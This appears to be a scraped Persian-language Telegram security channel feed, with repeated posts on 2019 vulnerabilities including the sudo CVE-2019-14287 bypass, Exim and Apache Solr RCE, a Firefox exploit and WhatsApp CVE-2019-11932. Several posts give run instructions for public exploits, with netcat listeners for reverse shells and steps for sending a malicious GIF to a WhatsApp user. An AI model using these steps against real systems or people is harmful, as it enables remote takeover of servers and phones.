کشف آسیب پذیری در Sudo
آسیب پذیری با شناسه CVE-2019-14287 به یوزر محدود شده اجازه میدهد تحت شرایط خاصی ، با معرفی خود با آیدی کاربری 1- و یا 4294967295 دستور خود را با سطح کاربری رووت اجرا کند!
تابعی که یوزرآیدی را به نام کاربری تبدیل میکند قادر به تبدیل صحیح دو عدد مذکور نیست و آنها را به 0 تبدیل میکند که معادل کاربر root است.
اطلاعات بیشتر:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
#news
#linux
#exploit
#privesc
@sec_nerd
آسیب پذیری با شناسه CVE-2019-14287 به یوزر محدود شده اجازه میدهد تحت شرایط خاصی ، با معرفی خود با آیدی کاربری 1- و یا 4294967295 دستور خود را با سطح کاربری رووت اجرا کند!
تابعی که یوزرآیدی را به نام کاربری تبدیل میکند قادر به تبدیل صحیح دو عدد مذکور نیست و آنها را به 0 تبدیل میکند که معادل کاربر root است.
اطلاعات بیشتر:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
#news
#linux
#exploit
#privesc
@sec_nerd
امنیت اطلاعات
کشف آسیب پذیری در Sudo آسیب پذیری با شناسه CVE-2019-14287 به یوزر محدود شده اجازه میدهد تحت شرایط خاصی ، با معرفی خود با آیدی کاربری 1- و یا 4294967295 دستور خود را با سطح کاربری رووت اجرا کند! تابعی که یوزرآیدی را به نام کاربری تبدیل میکند قادر به تبدیل…
asciinema.org
CVE-2019-14287
Recorded by Jas502n
امنیت اطلاعات
کشف آسیب پذیری در Sudo آسیب پذیری با شناسه CVE-2019-14287 به یوزر محدود شده اجازه میدهد تحت شرایط خاصی ، با معرفی خود با آیدی کاربری 1- و یا 4294967295 دستور خود را با سطح کاربری رووت اجرا کند! تابعی که یوزرآیدی را به نام کاربری تبدیل میکند قادر به تبدیل…
Don't panic! sudo flaw CVE-2019-14287 needs a specific config.
If a sudoers entry is written to allow the user to run a command
as any user except root, the bug can be used to avoid this restriction. Example:
myhost bob = (ALL, !root) /usr/bin/vi
https://www.openwall.com/lists/oss-security/2019/10/14/1
ترجمه:
هول نشید، آسیب پذیری سودو فقط تحت تنظیمات خاصی عمل میکنه.
اگر خط یا خطوطی در فایل sudoers وجود داشته باشه که به کاربری اجازه بده دستوری رو تحت هر دسترسی بجز root اجرا کنه، این محدودیت قابل دور زدن خواهد بود.
https://twitter.com/2xyo/status/1183839706586537985
#linux
#exploit
#privesc
@sec_nerd
If a sudoers entry is written to allow the user to run a command
as any user except root, the bug can be used to avoid this restriction. Example:
myhost bob = (ALL, !root) /usr/bin/vi
https://www.openwall.com/lists/oss-security/2019/10/14/1
ترجمه:
هول نشید، آسیب پذیری سودو فقط تحت تنظیمات خاصی عمل میکنه.
اگر خط یا خطوطی در فایل sudoers وجود داشته باشه که به کاربری اجازه بده دستوری رو تحت هر دسترسی بجز root اجرا کنه، این محدودیت قابل دور زدن خواهد بود.
https://twitter.com/2xyo/status/1183839706586537985
#linux
#exploit
#privesc
@sec_nerd
Twitter
2*yo
Don't panic! sudo flaw CVE-2019-14287 needs a specific config. If a sudoers entry is written to allow the user to run a command as any user except root, the bug can be used to avoid this restriction. Example: myhost bob = (ALL, !root) /usr/bin/vi https:/…
امنیت اطلاعات
کشف آسیب پذیری در Sudo آسیب پذیری با شناسه CVE-2019-14287 به یوزر محدود شده اجازه میدهد تحت شرایط خاصی ، با معرفی خود با آیدی کاربری 1- و یا 4294967295 دستور خود را با سطح کاربری رووت اجرا کند! تابعی که یوزرآیدی را به نام کاربری تبدیل میکند قادر به تبدیل…
شرح کاملتری از آسیب پذیری کشف شده در sudo
https://sysdig.com/blog/detecting-cve-2019-14287/
#linux
#exploit
#sudo
@sec_nerd
https://sysdig.com/blog/detecting-cve-2019-14287/
#linux
#exploit
#sudo
@sec_nerd
Sysdig
How to detect CVE-2019-14287 using Falco | Sysdig
A recent flaw (CVE-2019-14287) has been found in sudo. Learn how to use Falco or Sysdig Secure to detect any exploit attempts against this vulnerability.
exploit.py
2.2 KB
انتشار اکسپلویت اجرای دستور از راه دور بر روی سرویس exim با شناسه CVE-2019-10149
نسخه های آسیب پذیر: از 4.87 تا 4.91
کارکرد:
روی سرور مهاجم netcat به این صورت:
nc -lvp 9000
و اجرای اسکریپت:
python ./exploit.py --rhost example.com --rport 25 --lhost 10.10.10.100 --lport 9000
https://github.com/Diefunction/CVE-2019-10149
#exim
#rce
#exploit
@sec_nerd
نسخه های آسیب پذیر: از 4.87 تا 4.91
کارکرد:
روی سرور مهاجم netcat به این صورت:
nc -lvp 9000
و اجرای اسکریپت:
python ./exploit.py --rhost example.com --rport 25 --lhost 10.10.10.100 --lport 9000
https://github.com/Diefunction/CVE-2019-10149
#exim
#rce
#exploit
@sec_nerd
👍1
امنیت اطلاعات
Apache Solr RCE via Velocity Template Injection https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt #apache #rce #exploit @sec_nerd
آسیب پذیری RCE بر روی نسخه آخر Apache Solr یعنی نسخه 8.3.0 نیز کار میکند.
https://www.exploit-db.com/exploits/47572
#apache
#rce
#exploit
@sec_nerd
https://www.exploit-db.com/exploits/47572
#apache
#rce
#exploit
@sec_nerd
امنیت اطلاعات
اسکریپت گروه امنیتی Vulners برای nmap که هنگام اسکن،اکسپلویتهای مربوط به هر سرویس را معرفی میکند! https://github.com/vulnersCom/nmap-vulners #nmap #exploit @sec_nerd
کشف آسیب پذیری در سرویس های سرور هدف با استفاده از اسکریپت vulners
دستورالعمل:
wget https://raw.githubusercontent(.)com/vulnersCom/nmap-vulners/master/vulners.nse -O /usr/share/nmap/scripts/vulners.nse && nmap --script-updatedb
و سپس:
nmap -sV --script vulners <target>
https://twitter.com/s0md3v/status/1199934855724748802?s=20
#nmap
#exploit
#pentest
@sec_nerd
دستورالعمل:
wget https://raw.githubusercontent(.)com/vulnersCom/nmap-vulners/master/vulners.nse -O /usr/share/nmap/scripts/vulners.nse && nmap --script-updatedb
و سپس:
nmap -sV --script vulners <target>
https://twitter.com/s0md3v/status/1199934855724748802?s=20
#nmap
#exploit
#pentest
@sec_nerd
Twitter
Somdev Sangwan
Check if a server is running any vulnerable services wget https://raw.githubusercontent(.)com/vulnersCom/nmap-vulners/master/vulners.nse -O /usr/share/nmap/scripts/vulners.nse && nmap --script-updatedb All done, now you can do a scan with nmap -sV --script…
This media is not supported in your browser
VIEW IN TELEGRAM
اکسپلویت اجرای دستور از راه دور بر روی مرورگر فایرفاکس
https://github.com/0vercl0k/CVE-2019-11708
#firefox
#exploit
#rce
@sec_nerd
https://github.com/0vercl0k/CVE-2019-11708
#firefox
#exploit
#rce
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
[PoC] CVE-2019-11932 Whatsapp 2.19.216 Remote Code Execution
1. set the listner ip (nc -lvp 5555)
2. run ./exploit and save the content to .gif
3. exploit.gif file and send it as Document with WhatsApp to another WhatsApp user
https://github.com/dorkerdevil/CVE-2019-11932
https://github.com/awakened1712/CVE-2019-11932
#whatsapp
#exploit
#rce
https://github.com/valbrux/CVE-2019-11932-SupportApp
@sec_nerd
1. set the listner ip (nc -lvp 5555)
2. run ./exploit and save the content to .gif
3. exploit.gif file and send it as Document with WhatsApp to another WhatsApp user
https://github.com/dorkerdevil/CVE-2019-11932
https://github.com/awakened1712/CVE-2019-11932
#exploit
#rce
https://github.com/valbrux/CVE-2019-11932-SupportApp
@sec_nerd